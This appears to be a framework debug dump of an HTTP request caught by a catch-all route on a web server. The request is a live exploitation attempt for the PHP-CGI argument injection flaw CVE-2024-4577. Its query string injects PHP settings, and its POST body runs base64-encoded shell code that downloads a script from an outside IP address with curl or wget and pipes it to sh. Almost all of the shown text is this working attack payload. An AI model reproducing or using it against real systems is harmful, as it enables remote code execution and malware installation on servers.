POST http://49.12.205.23/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

CatchAllController :: index

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA
"=")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Controller\CatchAllController::index"
_firewall_context
"security.firewall.map.context.main"
_route
"catch_all"
_route_params
0 of 0
[ "catchall" => null "id" => "hello.world" ]
_security_firewall_run
"_security_main"
_stopwatch_token
"d3099e"
catchall
null
id
"hello.world"
platform
"beastscan"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"225"
content-type
"application/x-www-form-urlencoded"
host
"49.12.205.23:80"
upgrade-insecure-requests
"1"
user-agent
"Custom-AsyncHttpClient"
x-php-ob-level
"1"

Request Content

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>